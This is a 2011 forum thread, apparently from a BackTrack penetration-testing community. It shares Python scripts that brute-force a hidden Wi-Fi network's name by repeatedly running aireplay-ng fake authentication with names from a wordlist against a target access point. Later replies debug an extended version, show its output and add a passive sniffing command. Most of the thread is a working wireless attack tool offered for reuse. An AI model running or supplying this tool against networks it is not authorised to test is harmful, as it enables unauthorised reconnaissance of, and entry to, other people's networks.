Results 1 to 9 of 9

Thread: Useful python scripts - Brute hidden SSID

  1. #1
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Useful python scripts - Brute hidden SSID

    I only wrote one of these scripts but did add airmon-ng support to the one I didn't.

    The hidden SSID brute force attack is demonstrated in the video below as part of a broader framework.

    Skip ahead to 2:44 for the hidden SSID demo.
    Sorry there is no awesome music to jam out to.
    http://vimeo.com/31786626 Comments on video will be appreciated

    The script parts (not the frameword) are below... (I just started messing around with Python so this is an experiment)

    Might be useful to someone
    Kill all monitor interfaces
    Code:
    #!/usr/bin/python
    
    import subprocess
    import sys, binascii, re
    from subprocess import Popen, PIPE
    
    # read the file /proc/net/dev
    f = open('/proc/net/dev','r')
    
    # write to list
    ifacelist = f.read().split('\n') 
    
    # close the file
    f.close()
    
    # remove first 2 lines
    ifacelist.pop(0)
    ifacelist.pop(0)
    
    for line in ifacelist:
    
        ifacedata = line.replace(' ','').split(':')
    
        # narrow down selection
        if len(ifacedata) == 2:
    
            # verify interface is up
            if int(ifacedata[1]) > 0:
    
                # find iface (add list function)
                string = ifacedata[0]
                if string in ('mon0', 'mon1', 'mon2', 'mon3', 'mon4', 'ath0', 'ath1'):
    	      print '\nmonitor interface found - Putting it down'
    	      for temp in ifacedata:
    		subprocess.call(["airmon-ng", "stop", temp])
    brute hidden ssid script
    Code:
    #!/usr/bin/python
    
    
    # script created by Tony 'albatr0ss' Di Bernardo, October 2011
    # you are free to re-use the code as long as you give credit to the author in you works
    
    import subprocess
    import sys, binascii, re
    from subprocess import Popen, PIPE
    
    class bcolors:
        HEADER = '\033[95m'
        OKBLUE = '\033[94m'
        OKGREEN = '\033[92m'
        WARNING = '\033[93m'
        FAIL = '\033[91m'
        ENDC = '\033[0m'
    
        def disable(self):
            self.HEADER = ''
            self.OKBLUE = ''
            self.OKGREEN = ''
            self.WARNING = ''
            self.FAIL = ''
            self.ENDC = ''
    
    if (len(sys.argv) < 3):
    	print 'Usage: ' + sys.argv[0] + ' bssid essid_list channel interface'
    	sys.exit(-1)
    
    bssid = sys.argv[1]
    essid_list = sys.argv[2]
    channel = sys.argv[3]
    interface = sys.argv[4]
    
    
    subprocess.call(["airmon-ng", "start", interface, channel])
    
    print 'Searching name for Access Point ' + bssid + ' using file ' + essid_list
    
    f = open(essid_list, 'r')
    
    for temp in f:
    	essid =  re.sub(r'\W+','', temp)
    	print 'Trying Essid: ' + essid
    	c = Popen(['aireplay-ng', '--fakeauth', '0', '-T 1','-a',  bssid, '-e', essid, 'mon0'], stdout=PIPE)
    	output = c.stdout.read()
    	
    	finalresult = output.split('\n')[6]
    
    	if finalresult.find('Association successful') != -1 :
    		print bcolors.WARNING +  '\nFound! Access Point ' + bssid + ' Essid is ' + essid + bcolors.ENDC
    		subprocess.call(["airmon-ng", "stop", "mon0",])
    		sys.exit(0)
    
    print bcolors.FAIL + '\nEssid not in file ' + essid_list + ' for Access Point ' + bssid + bcolors.ENDC
    Last edited by Scamentology; 11-09-2011 at 08:25 AM.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Useful python scripts - Brute hidden SSID

    hi,
    great!!!!, thanks for your works

  3. #3
    Just burned their ISO
    Join Date
    Dec 2010
    Posts
    20

    Default Re: Useful python scripts - Brute hidden SSID

    How do I save the script. can i save it in notepad (windows) as brute.ph?

  4. #4
    Junior Member leg3nd's Avatar
    Join Date
    Feb 2011
    Posts
    32

    Default Re: Useful python scripts - Brute hidden SSID

    Cool idea, I went ahead and added on a couple other things I though may be useful to this concept.

    One thing you will need for mine to work is fully install airdrop-ng, follow the README in the tar.gz in order to do that. It is pretty simple.

    hiddenSSID-Finder: info-s3curity.com/80211/hiddenSSID.tar.gz

    Thanks for the idea, Only took a couple hours on this so let me know if you find bugs.
    Last edited by leg3nd; 11-29-2011 at 04:12 AM.

    JasagerPwn: http://code.google.com/p/jasagerpwn/
    Information s3curity: http://info-s3curity.com/

  5. #5
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: Useful python scripts - Brute hidden SSID

    Quote Originally Posted by leg3nd View Post
    Cool idea, I went ahead and added on a couple other things I though may be useful to this concept.

    One thing you will need for mine to work is fully install airdrop-ng, follow the README in the tar.gz in order to do that. It is pretty simple.

    hiddenSSID-Finder: info-s3curity.com/80211/hiddenSSID.tar.gz

    Thanks for the idea, Only took a couple hours on this so let me know if you find bugs.
    I found some time to look at this. I see what your going for. Good idea.

    first bug
    Code:
    Enter your choice: 1
    [!] Attack Status: Scanning for hidden access points..
    Script Error: local variable 'essidParse2' referenced before assignment
    fixed that by pushing lines 140 and 143 forward but then it loop forever without putting the device in monitor mode
    Code:
    [!] Attack Status: Scanning for hidden access points..                                                                                                         
    [!] Attack Status: Scanning for hidden access points..                                                                                                         
    [!] Attack Status: Scanning for hidden access points..                                                                                                         
    ^C[~] SSID Finder - Exiting with elegance...
    Got this for both attack mode 1 and 3

    Onto mode 2 and 4 I got this on 2
    Code:
    Enter your choice: 2
    Enter target BSSID(MAC): 00:00:00:00:00:00
    Enter target channel: 1
    [!] Attack Status: Checking Access Point Packets: 00:00:00:00:00:00[*] Attack Success: Found Hidden SSID:   @ 00:00:00:00:00:00
    [*] Outputting Cracked Hidden SSIDs...
    Hidden SSID:   @ 00:00:00:00:00:00
    I am sure the ESSID is in the list. I assume its supposed to reveal itself after the "Hidden SSID:" part.

    in mode 4 it skipped over the ESSID - It was the second on in the list. but it did list it during the attack.

    I will help you troubleshoot this more later when I have extra time (if that exists) and would like to include this tool in my arsenal.

    Another idea was to find a way to improve the speed of the brute force somehow. Maybe throw all the packets out quickly and parse the .csv file when its done. This takes forever the way it is now.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  6. #6
    Junior Member leg3nd's Avatar
    Join Date
    Feb 2011
    Posts
    32

    Default Re: Useful python scripts - Brute hidden SSID

    One thing that causes issues with the brute force idea is if the hidden network is WPA, aireplay-ng fakeauth can not always associate to it even if you specify the correct ESSID. Oddly enough, It worked on one of my access points running WPA but not the second one running WPA, both with the exact same encryption type.

    After trying to figure out a way to do that manually, I'm not sure its really possible with aireplay's output. I think increasing the bruteforce speed may be difficult, I thought about using the "-q" option with aireplay fakeauth which would shorten the keep-alive time, but it could sacrifice stablity.

    Let me know if you disable WPA if it still skips over the ESSID.


    UPDATE: I fixed both the bugs mentioned above as well as a couple others. Same download link.
    Last edited by leg3nd; 11-30-2011 at 03:08 AM.

    JasagerPwn: http://code.google.com/p/jasagerpwn/
    Information s3curity: http://info-s3curity.com/

  7. #7
    Just burned their ISO
    Join Date
    Dec 2010
    Posts
    20

    Default Re: Useful python scripts - Brute hidden SSID

    where can i download the script itself

  8. #8
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: Useful python scripts - Brute hidden SSID

    ah very nice.

    I added this as a passive attack to number 5 and moved the exit down to 6

    os.system('ssidsniff -i %s> /dev/null'%mIface)

    I haven't tested it yet but thought I would share the idea.

    This would make it a well rounded tool for its purpose.

    Quote Originally Posted by leg3nd View Post
    One thing that causes issues with the brute force idea is if the hidden network is WPA, aireplay-ng fakeauth can not always associate to it even if you specify the correct ESSID. Oddly enough, It worked on one of my access points running WPA but not the second one running WPA, both with the exact same encryption type.

    After trying to figure out a way to do that manually, I'm not sure its really possible with aireplay's output. I think increasing the bruteforce speed may be difficult, I thought about using the "-q" option with aireplay fakeauth which would shorten the keep-alive time, but it could sacrifice stablity.

    Let me know if you disable WPA if it still skips over the ESSID.


    UPDATE: I fixed both the bugs mentioned above as well as a couple others. Same download link.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  9. #9
    Junior Member leg3nd's Avatar
    Join Date
    Feb 2011
    Posts
    32

    Default Re: Useful python scripts - Brute hidden SSID

    Cool, Didn't know that existed. I added it like you said.

    JasagerPwn: http://code.google.com/p/jasagerpwn/
    Information s3curity: http://info-s3curity.com/

Similar Threads

  1. Worth of hidden SSID?
    By george8 in forum Beginners Forum
    Replies: 11
    Last Post: 12-09-2010, 01:09 AM
  2. hidden scripts
    By bbakker in forum Beginners Forum
    Replies: 6
    Last Post: 02-08-2010, 02:22 PM
  3. WPA and SSID hidden
    By ferretrj in forum OLD BackTrack 4 (pre) Final
    Replies: 11
    Last Post: 12-31-2009, 03:13 AM
  4. Hidden SSID ???
    By dark_magician in forum OLD BackTrack 4 General Support
    Replies: 6
    Last Post: 09-05-2009, 08:29 PM
  5. Discover a hidden ssid
    By Sir_Smoke in forum OLD BackTrack v2.0 Final
    Replies: 8
    Last Post: 09-06-2007, 09:41 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •